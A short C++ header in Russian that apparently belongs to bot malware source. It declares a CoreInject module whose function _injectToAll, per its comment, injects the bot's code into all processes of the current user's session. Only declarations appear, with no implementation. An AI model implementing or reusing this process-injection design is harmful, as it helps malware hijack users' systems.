/*
  Инжектор бота в процессы.
*/
#pragma once

namespace CoreInject
{
  /*
    Инициализация.
  */
  void init(void);

  /*
    Деинициализация.
  */
  void uninit(void);

  /*
    Инжектирование кода во все процессы текущей сесии текущего юзера.

    Return - true - если произошел инжект хотябы в один процесс,
             false - если не одного инжекта не произведено.
  */
  bool _injectToAll(void);
};
